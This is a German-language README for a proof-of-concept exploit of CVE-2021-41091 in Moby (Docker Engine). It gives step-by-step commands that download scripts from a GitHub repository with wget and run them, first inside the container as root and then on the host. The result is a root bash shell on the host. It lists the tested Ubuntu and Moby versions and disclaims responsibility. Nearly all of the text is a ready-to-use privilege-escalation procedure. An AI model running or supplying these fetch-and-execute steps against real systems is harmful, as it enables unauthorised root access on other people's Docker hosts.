
Proof-of-Concept-Exploit für CVE-2021-41091: Moby (Docker Engine) Verzeichnis-Traversal, der es unprivilegierten Benutzern erlaubt, SUID-Binärdateien aus dem Container auf dem Host auszuführen. Enthält PoC-Skripte für Ubuntu 20.04.
Ein Fehler in Moby (Docker Engine) erlaubt unprivilegierten Benutzern, Verzeichnisse zu durchqueren und Programme direkt aus dem Docker auf dem Host auszuführen. Falls im Docker ein suid-Programm vorhanden ist, kann der Benutzer es als suid auf dem Host ausführen.
Im Terminal des Containers laden wir die Datei docker.sh herunter und führen sie dann als root-Benutzer aus:
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/docker.sh
chmod +x docker.sh
./docker.sh
Jetzt laden wir auf dem Host die Datei principal.sh herunter und führen sie aus:
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/principal.sh
chmod +x principal.sh
./principal.sh
Wir führen den Befehl aus, den uns die Datei gibt, und können /bin/bash als root ausführen.
Diese Skripte wurden auf Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64) mit Moby Version 20.10.5+dfsg1 getestet.
DIE NUTZUNG DIESES REPOSITORY LIEGT IN DER VERANTWORTUNG DES NUTZERS UND NICHT DES AUTORS.